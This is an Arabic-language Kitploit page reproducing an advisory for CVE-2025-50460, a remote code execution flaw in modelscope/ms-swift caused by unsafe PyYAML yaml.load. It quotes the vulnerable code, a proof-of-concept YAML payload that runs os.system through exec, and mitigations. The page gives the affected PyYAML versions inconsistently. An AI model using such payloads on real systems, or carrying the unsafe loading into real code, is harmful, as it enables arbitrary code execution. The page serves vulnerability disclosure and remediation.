Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-50460 — التفاصيل التقنية والاستغلال لـ CVE-2025-50460 | Kitploit
أدوات/GitHubGitHub/anchor0221/cve-2025-50460
التحليل الثابتتحليل الثغرات الأمنيةتحليل الكودالاستغلالالأوراق والأبحاثالتعلم والتعليم
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

التفاصيل التقنية والاستغلال لـ CVE-2025-50460

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-50460: تنفيذ تعليمات برمجية عن بُعد في modelscope/ms-swift عبر إلغاء تسلسل PyYAML غير آمن

الحالة: بانتظار التحليل
تم وضع علامة على هذا السجل CVE لجهود الإثراء في NVD.

توجد ثغرة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في مشروع ms-swift الإصدار 3.3.0 بسبب إلغاء تسلسل غير آمن في tests/run.py باستخدام yaml.load() من مكتبة PyYAML (الإصدارات = 5.3.1). إذا تمكن المهاجم من التحكم في محتوى ملف تكوين YAML المُمرر إلى الوسيط --run_config، يمكن تنفيذ تعليمات برمجية عشوائية أثناء إلغاء التسلسل. قد يؤدي ذلك إلى اختراق النظام بالكامل. يتم تشغيل الثغرة عند تحميل ملف YAML ضار، مما يسمح بتنفيذ أوامر Python عشوائية مثل os.system(). يُوصى بترقية PyYAML إلى الإصدار 5.4 أو أعلى، واستخدام yaml.safe_load() للتخفيف من المشكلة.

الوصف

توجد ثغرة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في مشروع modelscope/ms-swift بسبب الاستخدام غير الآمن لـ yaml.load() مع إصدارات ضعيفة من مكتبة PyYAML (≥ 5.3.1). توجد المشكلة في السكربت tests/run.py، حيث يتم إلغاء تسلسل ملف تكوين YAML المقدم من المستخدم باستخدام yaml.load() مع yaml.FullLoader.

إذا تمكن المهاجم من التحكم في ملف تكوين YAML المقدم للوسيط --run_config أو استبداله، فقد يحقن حمولة ضارة تؤدي إلى تنفيذ تعليمات برمجية عشوائية.

المستودع المتأثر

  • المشروع: modelscope/ms-swift
  • الإصدارات المتأثرة: الأحدث
  • الملف: tests/run.py
  • الرابط الثابت على GitHub: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • التبعية: PyYAML <= 5.3.1

الكود المعرض للخطر

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

إثبات المفهوم (PoC)

الخطوة 1: إنشاء ملف YAML ضار (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

الخطوة 2: التنفيذ باستخدام PyYAML ضعيف (<= 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

يؤدي ذلك إلى تنفيذ os.system، مما يثبت تنفيذ التعليمات البرمجية.

التخفيف

  • استبدل yaml.load() بـ yaml.safe_load()
  • قم بترقية PyYAML إلى الإصدار 5.4 أو أحدث

مثال الإصلاح:

root@kitploit:~
# قبل
yaml.load(f, Loader=yaml.FullLoader)

# بعد
yaml.safe_load(f)

حالة CVE

المؤلف

  • اكتشف بواسطة: Yu Rong (戎誉) and Hao Fan (凡浩)
  • جهة الاتصال: [[email protected] ]
تنزيل الأداة
الحقلالقيمة
معرف CVECVE-2025-50460
درجة CVSSغير محدد بعد
CWECWE-502: إلغاء تسلسل البيانات غير الموثوقة
تاريخ التقرير2025-04-25
تاريخ الإفصاح2025-07-30
الإصدار المتأثرالأحدث
إصدار الإصلاح